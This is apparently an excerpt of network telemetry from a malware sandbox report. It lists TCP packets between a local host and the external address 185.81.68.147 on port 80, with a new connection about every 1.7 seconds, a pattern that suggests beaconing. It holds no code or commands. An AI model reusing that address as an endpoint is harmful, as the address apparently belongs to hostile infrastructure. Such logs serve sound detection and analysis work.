                                                                                                                                                                                                                      Dec 17, 2024 10:16:07.799942017 CET8049743185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:07.800143003 CET8049743185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:07.800190926 CET4974380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:07.802088022 CET4974380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:07.912677050 CET4974480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:07.921752930 CET8049743185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:08.032466888 CET8049744185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:08.032773018 CET4974480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:08.032773018 CET4974480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:08.152611017 CET8049744185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:08.153772116 CET4974480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:08.273561001 CET8049744185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:09.888241053 CET8049744185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:09.888298035 CET8049744185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:09.889101982 CET4974480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:09.889748096 CET4974480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:09.924324989 CET8049744185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:09.927097082 CET4974480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:10.004671097 CET4974580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:10.009676933 CET8049744185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:10.124433994 CET8049745185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:10.124511957 CET4974580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:10.124592066 CET4974580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:10.244410992 CET8049745185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:10.244472980 CET4974580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:10.364274979 CET8049745185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:11.558052063 CET8049745185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:11.558150053 CET8049745185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:11.558212996 CET4974580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:11.560307980 CET4974580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:11.661422968 CET4974680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:11.680025101 CET8049745185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:11.781203032 CET8049746185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:11.781420946 CET4974680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:11.781506062 CET4974680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:11.901910067 CET8049746185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:11.902003050 CET4974680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:12.021810055 CET8049746185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:13.385603905 CET8049746185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:13.385746002 CET8049746185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:13.385826111 CET4974680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:13.389408112 CET4974680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:13.505258083 CET4974780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:13.509234905 CET8049746185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:13.625062943 CET8049747185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:13.625242949 CET4974780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:13.625374079 CET4974780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:13.745218039 CET8049747185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:13.746149063 CET4974780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:13.865878105 CET8049747185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:15.071438074 CET8049747185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:15.071459055 CET8049747185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:15.071528912 CET4974780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:15.148644924 CET4974780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:15.264520884 CET4974880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:15.268629074 CET8049747185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:15.384377956 CET8049748185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:15.384486914 CET4974880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:15.385389090 CET4974880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:15.505096912 CET8049748185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:15.505170107 CET4974880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:15.625112057 CET8049748185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:16.892796993 CET8049748185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:16.892821074 CET8049748185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:16.892925978 CET4974880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:16.894496918 CET4974880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:17.005248070 CET4975080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:17.016055107 CET8049748185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:17.126020908 CET8049750185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:17.128927946 CET4975080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:17.128998995 CET4975080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:17.248750925 CET8049750185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:17.248821974 CET4975080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:17.369173050 CET8049750185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:18.731002092 CET8049750185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:18.731122971 CET8049750185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:18.731219053 CET4975080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:18.732881069 CET4975080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:18.848629951 CET4975180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:18.852884054 CET8049750185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:18.968493938 CET8049751185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:18.968616962 CET4975180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:18.968734980 CET4975180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:19.088473082 CET8049751185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:19.088586092 CET4975180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:19.209633112 CET8049751185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:20.604249954 CET8049751185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:20.604304075 CET8049751185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:20.604357004 CET4975180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:20.605652094 CET4975180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:20.725619078 CET8049751185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:20.752588987 CET4975380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:20.872390032 CET8049753185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:20.872536898 CET4975380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:20.874489069 CET4975380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:20.994260073 CET8049753185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:20.994328022 CET4975380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:21.114197016 CET8049753185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:22.480416059 CET8049753185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:22.480454922 CET8049753185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:22.480531931 CET4975380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:22.481898069 CET4975380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:22.582850933 CET4975480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:22.601686001 CET8049753185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:22.702821016 CET8049754185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:22.702956915 CET4975480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:22.703037024 CET4975480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:22.822941065 CET8049754185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:22.823024988 CET4975480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:22.942847013 CET8049754185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:24.156538010 CET8049754185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:24.156555891 CET8049754185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:24.156641006 CET4975480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:24.158036947 CET4975480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:24.270634890 CET4975580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:24.277827024 CET8049754185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:24.390465021 CET8049755185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:24.390578985 CET4975580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:24.390672922 CET4975580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:24.510373116 CET8049755185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:24.510447025 CET4975580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:24.630291939 CET8049755185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:25.998195887 CET8049755185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:25.998261929 CET8049755185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:25.998408079 CET4975580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:26.023350954 CET4975580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:26.130506992 CET4975680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:26.143625975 CET8049755185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:26.250432968 CET8049756185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:26.250518084 CET4975680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:26.250619888 CET4975680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:26.370451927 CET8049756185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:26.370508909 CET4975680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:26.491192102 CET8049756185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:27.694597960 CET8049756185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:27.694695950 CET8049756185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:27.694761992 CET4975680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:27.696218967 CET4975680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:27.801796913 CET4975780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:27.815893888 CET8049756185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:27.921530962 CET8049757185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:27.921674013 CET4975780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:27.921786070 CET4975780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:28.041497946 CET8049757185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:28.041588068 CET4975780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:28.161736012 CET8049757185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.536186934 CET8049757185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.536333084 CET8049757185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.536426067 CET4975780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.537741899 CET4975780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.645407915 CET4975880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.657656908 CET8049757185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.766916037 CET8049758185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.767024994 CET4975880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.767126083 CET4975880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.887058020 CET8049758185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.887168884 CET4975880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:30.006990910 CET8049758185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.385351896 CET8049758185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.385462046 CET8049758185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.385612965 CET4975880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.386857986 CET4975880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.489275932 CET4975980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.506635904 CET8049758185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.609932899 CET8049759185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.610037088 CET4975980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.610156059 CET4975980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.731009007 CET8049759185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.731168985 CET4975980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.850963116 CET8049759185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.230658054 CET8049759185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.230787039 CET8049759185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.230844021 CET4975980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.232070923 CET4975980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.335645914 CET4976080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.351835966 CET8049759185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.457858086 CET8049760185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.458137989 CET4976080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.458137989 CET4976080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.577887058 CET8049760185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.578124046 CET4976080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.698024988 CET8049760185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:34.917346954 CET8049760185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:34.917454004 CET8049760185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:34.917650938 CET4976080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:34.919332027 CET4976080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:35.020401001 CET4976180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:35.039067984 CET8049760185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:35.164174080 CET8049761185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:35.164336920 CET4976180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:35.164423943 CET4976180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:35.293728113 CET8049761185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:35.293823957 CET4976180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:35.413606882 CET8049761185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:36.760782003 CET8049761185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:36.761594057 CET8049761185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:36.761706114 CET4976180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:36.768223047 CET4976180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:36.879977942 CET4976280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:36.888135910 CET8049761185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:37.000005007 CET8049762185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:37.000117064 CET4976280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:37.000183105 CET4976280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:37.120079041 CET8049762185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:37.120145082 CET4976280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:37.240015984 CET8049762185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.624383926 CET8049762185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.624545097 CET8049762185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.624588966 CET4976280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.625947952 CET4976280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.739248991 CET4976380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.745919943 CET8049762185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.859097004 CET8049763185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.859298944 CET4976380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.859333992 CET4976380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.979477882 CET8049763185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.979604006 CET4976380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:39.099868059 CET8049763185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.303961992 CET8049763185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.304143906 CET8049763185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.304272890 CET4976380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.305447102 CET4976380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.411099911 CET4976480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.425256014 CET8049763185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.531284094 CET8049764185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.531369925 CET4976480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.531418085 CET4976480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.651222944 CET8049764185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.651293993 CET4976480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.771143913 CET8049764185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:42.154747009 CET8049764185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:42.154958010 CET8049764185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:42.155034065 CET4976480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:42.206079960 CET4976480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:42.320264101 CET4976580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:42.325975895 CET8049764185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:42.440118074 CET8049765185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:42.440288067 CET4976580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:42.440339088 CET4976580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:42.560170889 CET8049765185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:42.560244083 CET4976580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:42.679903030 CET8049765185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:44.060909033 CET8049765185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:44.061060905 CET8049765185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:44.061162949 CET4976580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:44.062493086 CET4976580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:44.176702023 CET4976680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:44.183084011 CET8049765185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:44.296468019 CET8049766185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:44.296561003 CET4976680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:44.296618938 CET4976680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:44.416340113 CET8049766185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:44.416454077 CET4976680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:44.536278963 CET8049766185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:45.914441109 CET8049766185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:45.914582968 CET8049766185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:45.914649010 CET4976680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:45.915988922 CET4976680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:46.020375967 CET4976780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:46.035732985 CET8049766185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:46.140345097 CET8049767185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:46.140456915 CET4976780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:46.140492916 CET4976780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:46.260555029 CET8049767185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:46.260622978 CET4976780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:46.380625963 CET8049767185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:47.587606907 CET8049767185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:47.587706089 CET8049767185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:47.587785959 CET4976780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:47.633793116 CET4976780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:47.746788025 CET4976880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:47.753624916 CET8049767185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:47.866965055 CET8049768185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:47.867058992 CET4976880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:47.867187977 CET4976880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:47.986988068 CET8049768185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:47.987076998 CET4976880192.168.2.8185.81.68.147
